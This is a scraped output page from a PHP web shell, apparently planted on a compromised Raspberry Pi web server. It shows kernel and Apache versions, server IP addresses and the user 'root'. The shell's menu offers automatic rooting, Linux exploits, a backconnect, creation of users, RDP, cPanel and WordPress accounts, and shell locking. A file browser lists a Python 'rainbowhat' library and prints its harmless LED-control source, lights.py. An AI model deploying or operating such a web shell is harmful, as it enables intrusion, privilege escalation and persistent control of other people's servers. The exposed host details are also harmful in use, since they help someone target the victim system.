Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
rainbowhat /
[ HOME SHELL ]
Name
Size
Permission
Action
HT16K33.py
4.41
KB
-rw-r--r--
HT16K33.pyc
3.85
KB
-rw-r--r--
__init__.py
1.09
KB
-rw-r--r--
__init__.pyc
1.36
KB
-rw-r--r--
alphanum4.py
8.01
KB
-rw-r--r--
alphanum4.pyc
6.44
KB
-rw-r--r--
apa102.py
3.59
KB
-rw-r--r--
apa102.pyc
4.88
KB
-rw-r--r--
bmp280.py
7.41
KB
-rw-r--r--
bmp280.pyc
6.27
KB
-rw-r--r--
buzzer.py
2.01
KB
-rw-r--r--
buzzer.pyc
2.55
KB
-rw-r--r--
lights.py
1.83
KB
-rw-r--r--
lights.pyc
3.26
KB
-rw-r--r--
touch.py
2.77
KB
-rw-r--r--
touch.pyc
4.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lights.py
try: import RPi.GPIO as GPIO except ImportError: raise ImportError("This library requires the RPi.GPIO module\nInstall with: sudo pip install RPi.GPIO") RED = 6 GREEN = 19 BLUE = 26 GPIO.setmode(GPIO.BCM) GPIO.setwarnings(False) class Light(object): def __init__(self, gpio_pin): object.__init__(object) self._is_setup = False self._gpio_pin = gpio_pin self.state = False def on(self): """Turn the light on.""" self.write(True) def off(self): """Turn the light off.""" self.write(False) def toggle(self): """Toggle the light.""" self.write(not self.state) def write(self, value): """Write a value to the light. :param value: Either True or False to turn light on or off/ """ if not self._is_setup: GPIO.setup(self._gpio_pin, GPIO.OUT, initial=GPIO.LOW) self._is_setup = True self.state = GPIO.HIGH if value else GPIO.LOW GPIO.output(self._gpio_pin, self.state) class Lights(object): red = Light(RED) green = Light(GREEN) blue = Light(BLUE) _all = [red, green, blue] def __getitem__(self, key): return self._all[key] def all(self, value): """Set a value to all lights. :param value: Either True or False for on/off. """ self.red.write(value > 0) self.green.write(value > 0) self.blue.write(value > 0) def rgb(self, r, g, b): """Set the LEDs by colour. :param r: Either True or False to turn Red light on/off. :param g: Either True or False to turn Green light on/off. :param b: EIther True or False to turn Blue light on/off. """ self.red.write(r > 0) self.green.write(g > 0) self.blue.write(b > 0) Lights = Lights()
Close